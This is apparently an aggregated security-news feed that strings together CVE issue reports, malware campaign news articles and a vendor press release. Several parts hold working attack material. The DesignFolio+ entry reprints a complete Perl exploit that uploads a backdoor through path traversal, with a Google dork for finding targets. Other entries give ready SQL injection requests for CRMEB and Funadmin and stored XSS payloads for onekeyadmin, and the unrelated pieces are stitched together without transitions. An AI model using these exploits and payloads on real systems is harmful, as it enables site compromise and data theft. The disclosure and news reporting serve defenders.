CRMEB <=1.3.4 is vulnerable to SQL Injection via /api/admin/user/list.

\[Suggested description\]  
sql injection vulnerability exists in crmeb\_java <=1.3.4  
/api/admin/user/list endpoint Unfiltered parameters 'level' cause sqli

\[Vulnerability Type\]  
SQLi

\[Vendor of Product\]  
https://github.com/crmeb/crmeb\_java

\[Affected Product Code Base\]  
<=1.3.4

\[Affected Component\]

GET /api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a% HTTP/2  
Host: api.java.crmeb.net  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Authori-Zation: 0d8ed99c6e51404f82a22ba15332300a  
Origin: https://admin.java.crmeb.net  
Referer: https://admin.java.crmeb.net/  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-site  
Te: trailers

\[Attack Type\]  
Remote

\[Vulnerability details\]  
step 1 login admin click user Manager and click search button  

step 2 intercept request use burpsuite  

step 3 insert payload in paramter “level”

level=1+and+extractvalue(1,CONCAT(1,user()))

https://api.java.crmeb.net/api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a%

there you can see it

\[Impact Code execution\]  
true  
\[Cause of vulnerability\]  
\\crmeb\\crmeb-service\\src\\main\\resources\\mapper\\user\\UserMapper.xml  
line 36 "${level}"  
When using "${}", program will do not do any processing, and directly splice the value into the sql statement lead sqli

CVE-2023-25223: There is a sql injection vulnerability exists in crmeb_java  · Issue #9 · crmeb/crmeb_java

By Waqas
Currently, in its cyber espionage campaign, Sharp Panda hackers are targeting government entities in Asia.
This is a post from HackRead.com Read the original post: Chinese Sharp Panda Group Unleashes SoulSearcher Malware

****It is currently unclear whether a single actor is responsible for the Soul framework, but it is confirmed that it is attributed to a Chinese group.****

The cybersecurity researchers at Check Point have shared their findings of a campaign discovered in late 2020 in which the initial infection vector is the same as previously associated with a **Chinese APT group** dubbed Sharp Panda.

In their latest campaign, government entities in Southeast Asia have been the target. Researchers state that Sharp Panda has been involved in multiple campaigns targeting Southeast Asian countries including Vietnam, Thailand, and Indonesia.

**Chinese Espionage Group Drop SoulSearcher Loader**

The group has changed their tactics in this campaign, as instead of using VictoryDll, they are using the new version of SoulSearcher loader to load the Soul modular framework. This framework was previously observed in another spying campaign targeting ICT, defense, and healthcare sectors in **Southeast Asia**.

It is currently unclear whether a single actor is responsible for the Soul framework, but it is confirmed that it is attributed to a Chinese group. In this ongoing surveillance operation, Sharp Panda specifically targeted Southeast Asian government entities using **spear-phishing emails** through which they gained initial access to their targets’ networks.

**Email Analysis**

According to Check Point researchers, these emails contain a Word document with government-themed lures. The attackers leveraged a remote template for downloading and executing a malicious RTF document equipped with the **RoyalRoad kit**.

Once it has invaded the network, it initiates a string of in-memory loaders, comprising a custom DLL downloader the researchers named “5.t Downloader,” and another 2nd-stage loader that delivers the final payload.

The final payload previously seen in Sharp Panda campaigns was VictoryDll, which enabled remote access and data theft. In this campaign, the attackers targeted a government entity with a geo-fenced C2 server that delivered a new version of the SoulSearcher loader, which can download, decrypt, and load different modules of the Soul modular backdoor in memory.

**How Does the Attack Work?**

In a **blog post**, researchers wrote that, the downloader is dropped by RoyalRoad RTF as res6.a onto the disk and executed by a scheduled task with rundll32.exe, Start A, the functionality of which is consistent with previous Sharp Panda activities. The C2 servers of the attackers return payloads to requests from the IP addresses of their target locations due to being geofenced.

The infection chain (Image credit: Checkpoint)

Contrary to the attackers’ previous tactics of sending encrypted data using RC4 with base64 encoding, in the new campaign the payload request is issued to the same PHP path with the host parameter specified and both MD5- hashed and in clear-text. The new version is a simpler version of string encryption, with a loop **XORing** an encrypted character.

**What Data is Stolen?**

The downloader collects sensitive device data such as the OS name, hostname, version, username, system type (32- or 64-bit), MAC addresses of the networking adapters, and antivirus software information. If the device is promising enough, the server contains the next stage executable in an encrypted format and its MDS checksum.

1.  **Chinese hackers hide malware in Windows logo**
2.  **Chinese hackers hit Windows, Linux and macOS**
3.  **Chinese hackers hit Group-IB cybersecurity firm**
4.  **Chinese state hackers exploiting Log4j vulnerability**
5.  **Backdoor into FortiOS: Chinese hackers utilize 0-day**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Chinese Sharp Panda Group Unleashes SoulSearcher Malware

Attackers use phishing emails that appear to come from reputable organizations, dropping the payload using public cloud servers and an old Windows UAC bypass technique.

A phishing campaign targeting organizations in Eastern Europe is leveraging an old Windows User Account Control (UAC) bypass technique to drop the Remcos remote access Trojan (RAT), to perform cyber espionage across the region, researchers have found.

The campaign uses emails that appear to come from legitimate and highly regarded institutions in the targeted country to lure victims, researchers from SentinelOne revealed in a recent blog post. If successful in getting users to click on a malicious link, attackers leverage the DBatLoader malware loader, which abuses a technique identified more than two years ago to set up mock trusted folders to bypass Windows UAC and drop the RAT, the researchers said.

DBatLoader is known for using public cloud infrastructure to host its malware staging component, the SentinelOne researchers said. In the case of this campaign, they have observed download links to Microsoft OneDrive and Google Drive sites that have been used for this purpose, one of which was active for more than a month, they said.

"When a user decompresses the attachment and runs the executable within, DBatLoader downloads and executes an obfuscated second-stage payload data from a public cloud location," SentinelOne senior threat researcher Aleksandar Milenkoski wrote in the post.

The executable in this case is the Remcos RAT, a malware that threat actors with cybercriminal and espionage motivations widely use to take over computers and collect keystrokes, audio, video, screenshots, and system information as well as deliver other malware, the researchers noted.

Indeed, the campaign observed by SentinelOne is likely linked to reports by the Ukrainian CERT of "phishing campaigns targeting Ukrainian state institutions for espionage purposes using password-protected archives as email attachments," which also deliver the RAT, Milenkoski wrote.

**Reputation-Based Phishing Lures**

Rather than use socially engineered messages in the campaign, attackers rely solely on the reputations of the purported organizations from which the messages are sent to trick victims into taking the bait, the SentinelOne researchers said.

In fact, the messages generally contain no text at all but merely the malicious attachment, they said. In the cases that the messages do include text, it's written in the language of the target’s country, the researchers added. Further, attackers typically send the emails to the sales departments of the targets or publicly available contact email addresses for the organizations. The emails include attachments in the form of tar.lzarchives that typically masquerade as financial documents, such as invoices or tender documentation that appear to originate from institutions or business organizations related to the target. Some attachments purport to be Microsoft Office, LibreOffice, or PDF documents and use double extensions and/or application icons to fool victims.

"Many of the phishing emails we observed have been sent from email accounts with top-level domains of the same country as where the target is based," Milenkoski wrote.

"We observed emails sent from what seems to be compromised private email accounts and accounts from public email services that are also used by the targets and the legitimate institutions or organizations, which are supposedly sending the email," Milenkoski added.

**Abusing Windows UAC Bypass**

When a user decompresses the attachment and runs the executable within, DBatLoader downloads and executes an obfuscated second-stage payload data from an aforementioned public cloud location, which then creates and executes an initial Windows batch script in the %Public%\\Libraries directory, the researchers said.

This script abuses a previously identified method for bypassing Windows UAC that involves the creation of mock trusted directories, such as %SystemRoot%\\System32; this allows attackers to conduct activities with elevated privileges without alerting users, the researchers said. Security researcher Daniel Gebert discovered and subsequently revealed the UAC bypass in a July 2020 post on his security blog.

The bypass occurs through a combination of the mock trusted directories and DLL hijacking, which together cause Windows to automatically elevate the process without issuing an UAC prompt, Milenkoski wrote.

The resulting bypass allows DBatLoader to establish persistence across system reboots, by copying itself in the %Public%\\Libraries directory and creating an autorun registry key that points to an Internet Shortcut file, he explained in the post. This executes the DBatLoader executable in the mock directory, which in turn executes the Remcos RAT through process injection.

Researchers observed a wide variety of Remcos RAT configurations on victim systems, most of which were configured for keylogging and screenshot-theft capabilities, "as well as 'duckdns' dynamic DNS domains for command-and-control purposes," Milenkoski wrote.

**Reducing Cyber-Risk & Avoiding Compromise**

Researchers made a number of recommendations to security administrators to dodge the campaign, particularly given its use of DBatLoader coming through on the public cloud.

First and foremost, they advised vigilance against malicious network requests to public cloud instances, noting that attackers' use of public cloud infrastructure for hosting malware is an attempt to make network traffic for malware delivery look legitimate and thus harder for organizations to detect. "This tactic is popular amongst cybercriminals and espionage threat actors," Milenkoski observed.

Researchers also recommended that administrators monitor for suspicious file creation activities in the %Public%\\Library directory, and process-execution activities that involve filesystem paths with trailing spaces, especially \\Windows \\. "The latter is a reliable indicator of malware attempting to bypass Windows UAC by abusing mock trusted directories, such as %SystemRoot%\\System32," Milenkoski wrote.

Another tactic for avoiding compromise that administrators should consider is configuring Windows UAC to "always notify," which will always alert users when a program attempts to make changes to computers across a business network, he added.

Researchers also enforced general advice for avoiding phishing compromise in any form by ensuring that administrators and employees alike are aware of what malicious emails look like and how to avoid engaging with them.

Remcos RAT Spyware Scurries Into Machines via Cloud Servers

**REDWOOD CITY, Calif.****,** **March 7, 2023** **/PRNewswire/ --** Delinea, a leading provider of Privileged Access Management (PAM) solutions for seamless security, today announced new features for its Privilege Manager and DevOps Secrets Vault products. Updates to both products make it more seamless to implement the controls frequently required to secure or renew cyber insurance policies.

Enhancements to Privilege Manager, Delinea's solution for managing privileged access on workstations, focus on policies for Windows Store applications and updates for MacOS Ventura. The latest version of DevOps Secrets Vault, Delinea's high-speed vault for DevOps and DevSecOps teams, makes it easier for developers to install the Command Line Interface (CLI) in their favorite coding console while also providing their own encryption keys.

According to a recent Delinea survey, almost 80% of respondents indicate that they have already used their cyber insurance policies, and only 40% met PAM requirements when they applied for their policies. Credentials hard-coded in applications are a vulnerability that can be exploited, potentially leading to claims that may not be supported when less than 50% of survey respondents' policies cover data recovery. Furthermore, the survey revealed that ransomware attacks often start on workstations, and over 70% of policies will not cover ransomware payments.

**Stronger privilege controls on Windows and Macs**

The latest version of Privilege Manager allows administrators to build policies for applications installed from the Windows Store and other Universal Windows Platform applications, defining which applications are not allowed to run. Enhancements to the native MacOS agent ensure that users on MacOS Ventura have consistent application controls. Both updates make installing ransomware on Windows and Mac workstations more difficult, including those running the latest operating systems from Microsoft and Apple. Other updates include enhancements to the UI that highlight the number of workstations impacted by policy changes and management of certificate credentials.

**Streamlined credential management in the most popular coding consoles**

New CLI installers for DevOps Secrets Vault allow developers to run a native command in their environment to install and begin dynamically injecting credentials into their applications. CLI installers are supported for several of the most popular coding consoles – HomeBrew, PowerShell, Aqua, Curl, Snap, and Scoop. Enhancements to the Command Line Interface allow developers to configure and use their own encryption keys to provide even stronger security. Additional enhancements include new flags to the rest API and CLI for more easily searching objects, and an improved "break glass" security function.

"Our customers increasingly approach us with more stringent cyber insurance requirements, often necessitating more modern Privileged Access Management controls," said Phil Calvin, Chief Product Officer at Delinea. "We continuously focus on making it less complicated to implement privileged access policies, and these two product releases make PAM more seamless for both workstations and coded credentials."

Organizations can start a free trial of the latest versions of Privilege Manager at https://delinea.com/products/privilege-manager and DevOps Secrets Vault at https://delinea.com/products/devops-secrets-management-vault.

**About Delinea**

Delinea is a leading provider of privileged access management (PAM) solutions that make security seamless for the modern, hybrid enterprise. Our solutions empower organizations to secure critical data, devices, code, and cloud infrastructure to help reduce risk, ensure compliance, and simplify security. Delinea removes complexity and defines the boundaries of access for thousands of customers worldwide. Our customers range from small businesses to the world's largest financial institutions, intelligence agencies, and critical infrastructure companies. Learn more about Delinea on LinkedIn, Twitter, and YouTube.

Delinea Adds New features for its Privilege Manager and DevOps Secrets Vault

** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in UpThemes Theme DesignFolio Plus 1.2 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 53f6ae62878076f99718e5feb589928e83c879a9. It is recommended to apply a patch to fix this issue. The identifier VDB-221809 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

    #########################################################
    # Exploit Title: Wordpress Theme DesignFolio+ Arbitrary File Upload Vulnerability
    # Google dork: inurl:wp-content/themes/DesignFolio-Plus
    # Author: CrashBandicot
    # Date: 04.03.2015
    # Vendor HomePage: https://github.com/UpThemes/DesignFolio-Plus
    # Software Link: https://github.com/UpThemes/DesignFolio-Plus/archive/master.zip
    # tested on : MsWin32
    #########################################################
     
    Vulnerable File : upload-file.php
    <?php
    //Upload Security
    $upload_security = md5($_SERVER['SERVER_ADDR']);
    $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
    if( $_FILES[$upload_security] ):
            $file = $_FILES[$upload_security];
            $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
              
                    if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
                            if(chmod($file,0777)):
                                echo "success"; 
                            else:
                                    echo "error".$_FILES[$upload_security]['tmp_name'];
                            endif;
                    else:
                        echo "error".$_FILES[$upload_security]['tmp_name'];
                    endif;
    endif;
    ?>
     
    Exploit
     
    #!/usr/bin/perl
     
    use Digest::MD5 qw(md5 md5_hex);
    use MIME::Base64;
    use IO::Socket;
    use LWP::UserAgent;
     
        system(($^O eq 'MSWin32') ? 'cls' : 'clear');
            print "\n\t     ! *** #  ^_^ # *** !\n\t      :p\n\n";
     
    $use = "\n\t  [!] ./$0 127.0.0.1 backdoor.php";
     
    ($target ,$file) = @ARGV;
     
    die "$use" unless $ARGV[0] && $ARGV[1];
     
    if($target =~ /http:\/\/(.*)\//){ $target = $1; }
    elsif($target =~ /http:\/\/(.*)/){ $target = $1; }
    elsif($target =~ /https:\/\/(.*)\//){ $target = $1; }
    elsif($target =~ /https:\/\/(.*)/){ $target = $1; }
     
    my $addr = inet_ntoa((gethostbyname($target))[4]);
    my $digest = md5_hex($addr);
    my $dir = encode_base64('../../../../');
     
    my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
    $pst = $ua->post("http://".$target."/wp-content/themes/designfolio-plus/admin/upload-file.php", Content_Type => 'form-data', Content => [ $digest => [$file] , upload_path => $dir ]);
    if($pst->is_success) { print "[+] Backdoor Uploaded !"; } else { print "\n [-] Bad Response Header :/ FAIL"; }
     
    __END__
     
     
    # File path: http://target/shell.php

CVE-2015-10087: Offensive Security’s Exploit Database Archive

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\MemberLevel.php.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Vulnerability location app\\backend\\controller\\member\\MemberLevel.php# is called  
app\\backend\\controller\\member\\Member.php#index method  

After getting the parameter selectFields here, continue to enter  
selectFields method  
app\\common\\traits\\Curd.php#selectList  
  
Finally, enter \\vendor\\topthink\\think-orm\\src\\db\\BaseQuery.php#field is spliced ​​into sql without filtering to cause sql injection

Vulnerability reproduction:  
Background administrator rights  
sqlmap poc  
GET /backend/member.memberLevel/index?parentField=pid&selectFields%5Bname%5D=*&selectFields%5Bvalue%5D=id HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D X-Csrf-Token: 57cf5483b08025dc11534643f460d0fc X-Requested-With: XMLHttpRequest Accept-Encoding: gzip

CVE-2023-24781: member.memberLevel#selectFields[name] has sql injection vulnerability · Issue #8 · funadmin/funadmin

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Administrator module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    url  
    http://192.168.3.129:8091/admin1#admin/index

poc POST /admin1/admin/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 224 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/admin/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","cover":"","account":"test<img src=1 onerror=alert("xss");>","email":"aa@xxxqq.com","nickname":"aa@xxxqq.com","login\_count":"","group\_id":1,"password":"aa@xxxqq.com","status":1,"create\_time":"","theme":"template"}  

then you can view xss in url  
http://192.168.3.129:8091/admin1#admin/index

CVE-2023-26953: Background administrator management - Adding an administrator has a storage xss vulnerability · Issue #8 · keheying/onekeyadmin

Cybersecurity researchers have discovered a new information stealer dubbed SYS01stealer targeting critical government infrastructure employees, manufacturing companies, and other sectors.
"The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure

Data Safety / Cyber Threat

Cybersecurity researchers have discovered a new information stealer dubbed **SYS01stealer** targeting critical government infrastructure employees, manufacturing companies, and other sectors.

"The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure victims into downloading a malicious file," Morphisec said in a report shared with The Hacker News.

"The attack is designed to steal sensitive information, including login data, cookies, and Facebook ad and business account information."

The Israeli cybersecurity company said the campaign was initially tied to a financially motivated cybercriminal operation dubbed Ducktail by Zscaler.

However, WithSecure, which first documented the Ducktail activity cluster in July 2022, said the two intrusion sets are different from one another, indicating how the threat actors managed to confuse attribution efforts and evade detection.

The attack chain, per Morphisec, commences when a victim is successfully lured into clicking on a URL from a fake Facebook profile or advertisement to download a ZIP archive that purports to be cracked software or adult-themed content.

Opening the ZIP file launches a based loader – typically a legitimate C# application – that's vulnerable to DLL side-loading, thereby making it possible to load a malicious dynamic link library (DLL) file alongside the app.

Some of the applications abused to side-load the rogue DLL are Western Digital's WDSyncService.exe and Garmin's ElevatedInstaller.exe. In some instances, the side-loaded DLL acts as a means to deploy Python and Rust-based intermediate executables.

Irrespective of the approach employed, all roads lead to the delivery of an installer that drops and executes the PHP-based SYS01stealer malware.

The stealer is engineered to harvest Facebook cookies from Chromium-based web browsers (e.g., Google Chrome, Microsoft Edge, Brave, Opera, and Vivaldi), exfiltrate the victim's Facebook information to a remote server, and download and run arbitrary files.

Discover the Latest Malware Evasion Tactics and Prevention Strategies

Ready to bust the 9 most dangerous myths about file-based attacks? Join our upcoming webinar and become a hero in the fight against patient zero infections and zero-day security events!

RESERVE YOUR SEAT

It's also equipped to upload files from the infected host to the command-and-control (C2) server, run commands sent by the server, and update itself when a new version is available.

The development comes as Bitdefender revealed a similar stealer campaign known as S1deload that's designed to hijack users' Facebook and YouTube accounts and leverage the compromised systems to mine cryptocurrency.

"DLL side-loading is a highly effective technique for tricking Windows systems into loading malicious code," Morphisec said.

"When an application loads in memory and search order is not enforced, the application loads the malicious file instead of the legitimate one, allowing threat actors to hijack legitimate, trusted, and even signed applications to load and execute malicious payloads."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SYS01stealer: New Threat Using Facebook Ads to Target Critical Infrastructure Firms

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the User Group module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：

<img src=1 onerror=alert("xss");>  
url  
http://192.168.3.129:8091/admin1#userGroup/index  
  
poc  
POST /admin1/userGroup/save HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 114  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/userGroup/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"id":"","title":"test<img src=1 onerror=alert("xss");>","integral":0,"default":0,"status":1,"theme":"template"}  
  
then you can view xss in url  
http://192.168.3.129:8091/admin1#userGroup/index

CVE-2023-26954: Backstage member grouping - add storage xss vulnerability · Issue #11 · keheying/onekeyadmin

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Admin Group module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    <img src=1 onerror=alert("xss");>  
    url  
    http://192.168.3.129:8091/admin1#adminGroup/index

\`POST /admin1/adminGroup/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 95 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/adminGroup/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","title":"<img src=1 onerror=alert("xss");>","status":1,"role":\[\],"theme":"template"}\`  

then you can view xss in  
url:  
http://192.168.3.129:8091/admin1#adminGroup/index

Tag

#windows